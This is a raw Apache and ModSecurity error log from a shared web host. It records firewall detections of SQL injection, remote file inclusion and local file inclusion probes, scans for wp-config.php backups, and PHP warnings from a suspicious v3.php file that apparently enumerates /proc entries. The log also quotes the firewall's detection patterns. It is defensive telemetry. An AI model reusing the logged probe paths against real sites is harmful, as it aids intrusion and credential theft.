[Tue May 12 06:44:44.330194 2026] [security2:error] [pid 1842385:tid 1842409] [client 89.187.168.211:51340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwPBs7kySIUZ3ORnI8wAAAARI"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:44:44.330409 2026] [security2:error] [pid 1842385:tid 1842409] [client 89.187.168.211:51340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKwPBs7kySIUZ3ORnI8wAAAARI"], referer: http://la-grande-fabrique.com/?page_id=1928
[Tue May 12 06:45:12.704959 2026] [security2:error] [pid 1844863:tid 1844884] [client 102.165.1.211:55679] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwWPaAnTZtx1_H_wzOnwAAAU8"], referer: https://www.piregwan-genesis.com/
[Tue May 12 06:45:18.581078 2026] [security2:error] [pid 1825287:tid 1825309] [client 52.203.68.145:28748] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bestlivecamporn.com"] [unique_id "agKwXggpmE1yW0glLdhEUgAAAMQ"]
[Tue May 12 06:45:18.581422 2026] [security2:error] [pid 1825287:tid 1825309] [client 52.203.68.145:28748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bestlivecamporn.com"] [unique_id "agKwXggpmE1yW0glLdhEUgAAAMQ"]
[Tue May 12 06:45:18.581651 2026] [security2:error] [pid 1825287:tid 1825309] [client 52.203.68.145:28748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bestlivecamporn.com"] [unique_id "agKwXggpmE1yW0glLdhEUgAAAMQ"]
PHP Warning:  filesize(): stat failed for /proc/689/task/689/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/689/task/689/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/689/task/689/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/689/task/689/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/689/task/689/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/689/task/689/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:45:32.583507 2026] [security2:error] [pid 1844863:tid 1844874] [client 43.157.148.38:59726] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agKwbPaAnTZtx1_H_wzOsQAAAUU"]
[Tue May 12 06:45:36.882469 2026] [security2:error] [pid 1820198:tid 1820210] [client 43.157.148.38:41640] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/six-miniatures-pour-sextuor/"] [unique_id "agKwcM1tk6y7yBJLpJpNFgAAAIo"], referer: https://www.maelbailly.fr/?p=30
[Tue May 12 06:45:54.180091 2026] [authz_core:error] [pid 1825287:tid 1825321] [client 194.163.140.214:57600] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/error_log, referer: binance.com
[Tue May 12 06:46:22.591811 2026] [authz_core:error] [pid 1842385:tid 1842401] [client 194.163.140.214:64710] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/error_log, referer: binance.com
[Tue May 12 06:46:25.671812 2026] [authz_core:error] [pid 1842385:tid 1842408] [client 216.73.216.110:22025] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/blog/error_log
[Tue May 12 06:46:42.873754 2026] [security2:error] [pid 1825287:tid 1825329] [client 34.225.243.131:38909] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://64.227.132.54 found within ARGS:url: https://64.227.132.54/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwsggpmE1yW0glLdhEjAAAANc"]
[Tue May 12 06:46:42.874246 2026] [security2:error] [pid 1825287:tid 1825329] [client 34.225.243.131:38909] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwsggpmE1yW0glLdhEjAAAANc"]
[Tue May 12 06:46:42.874497 2026] [security2:error] [pid 1825287:tid 1825329] [client 34.225.243.131:38909] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwsggpmE1yW0glLdhEjAAAANc"]
[Tue May 12 06:47:03.819976 2026] [security2:error] [pid 1808852:tid 1808874] [client 216.73.216.110:31020] ModSecurity: Warning. Matched phrase "proc/self/fd/3" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/fd/3 found within ARGS:filesrc: /proc/self/fd/3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKwxxfeipD4uoG21FpJUwAAABM"]
[Tue May 12 06:47:03.820713 2026] [security2:error] [pid 1808852:tid 1808874] [client 216.73.216.110:31020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKwxxfeipD4uoG21FpJUwAAABM"]
[Tue May 12 06:47:03.912847 2026] [security2:error] [pid 1808852:tid 1808874] [client 216.73.216.110:31020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKwxxfeipD4uoG21FpJUwAAABM"]
[Tue May 12 06:47:06.507588 2026] [security2:error] [pid 1820198:tid 1820215] [client 52.203.65.83:26049] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://49.50.172.162 found within ARGS:url: http://49.50.172.162/bbs/board.php?bo_table=free"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwys1tk6y7yBJLpJpNYAAAAI8"]
[Tue May 12 06:47:06.508088 2026] [security2:error] [pid 1820198:tid 1820215] [client 52.203.65.83:26049] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwys1tk6y7yBJLpJpNYAAAAI8"]
[Tue May 12 06:47:06.508343 2026] [security2:error] [pid 1820198:tid 1820215] [client 52.203.65.83:26049] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKwys1tk6y7yBJLpJpNYAAAAI8"]
[Tue May 12 06:47:34.384537 2026] [:error] [pid 1825287:tid 1825311] [client 99.174.168.7:52250] File does not exist: /home/pweilcom/public_html/xmlrpc.php
[Tue May 12 06:47:59.901039 2026] [:error] [pid 1842385:tid 1842411] [client 144.76.19.157:20912] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:48:30.793753 2026] [:error] [pid 1825287:tid 1825314] [client 14.247.251.80:37661] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 06:48:37.856287 2026] [authz_core:error] [pid 1825287:tid 1825315] [client 47.128.28.165:12348] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/PHPMailer/error_log
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899829/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899829/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899829/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899829/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899829/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899829/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:49:10.838745 2026] [security2:error] [pid 1844863:tid 1844876] [client 43.134.178.104:55786] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/uploads/2019/07/Cuivrerie-Demo.otf_.zip"] [unique_id "agKxRvaAnTZtx1_H_wzPegAAAUc"]
[Tue May 12 06:49:18.364797 2026] [security2:error] [pid 1842385:tid 1842406] [client 43.134.92.251:36558] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/chat-bot/"] [unique_id "agKxThs7kySIUZ3ORnI9uAAAARA"]
[Tue May 12 06:50:04.056172 2026] [security2:error] [pid 1825287:tid 1825326] [client 49.235.136.28:39860] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agKxfAgpmE1yW0glLdhFtQAAANQ"]
[Tue May 12 06:50:05.730565 2026] [security2:error] [pid 1808852:tid 1808863] [client 43.157.153.236:38682] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/mphb_room_type_facility/64"] [unique_id "agKxfRfeipD4uoG21FpKQgAAAAg"]
[Tue May 12 06:50:12.658850 2026] [security2:error] [pid 1825179:tid 1825210] [client 49.235.136.28:48558] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agKxhNr1yOh9Tvizezi3JwAAAEw"], referer: http://www.letamsgarage.fr
[Tue May 12 06:50:16.410550 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/wp-config.php.backup"] [unique_id "agKxiM1tk6y7yBJLpJpOUAAAAIw"]
[Tue May 12 06:50:16.410704 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/wp-config.php.backup"] [unique_id "agKxiM1tk6y7yBJLpJpOUAAAAIw"]
[Tue May 12 06:50:16.410931 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agKxiM1tk6y7yBJLpJpOUAAAAIw"]
[Tue May 12 06:50:17.102724 2026] [security2:error] [pid 1820198:tid 1820201] [client 162.62.231.139:46744] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/"] [unique_id "agKxic1tk6y7yBJLpJpOVQAAAIE"]
[Tue May 12 06:50:21.469299 2026] [security2:error] [pid 1825287:tid 1825308] [client 43.131.23.154:56412] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agKxjQgpmE1yW0glLdhFxgAAAMM"]
[Tue May 12 06:50:22.546847 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/backup.wp-config.php"] [unique_id "agKxjs1tk6y7yBJLpJpOeAAAAIw"]
[Tue May 12 06:50:22.547020 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/backup.wp-config.php"] [unique_id "agKxjs1tk6y7yBJLpJpOeAAAAIw"]
[Tue May 12 06:50:22.547303 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agKxjs1tk6y7yBJLpJpOeAAAAIw"]
[Tue May 12 06:50:30.054225 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/new-wp-config.php"] [unique_id "agKxls1tk6y7yBJLpJpOswAAAIw"]
[Tue May 12 06:50:30.054388 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/new-wp-config.php"] [unique_id "agKxls1tk6y7yBJLpJpOswAAAIw"]
[Tue May 12 06:50:30.054576 2026] [security2:error] [pid 1820198:tid 1820212] [client 172.212.217.10:38014] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agKxls1tk6y7yBJLpJpOswAAAIw"]
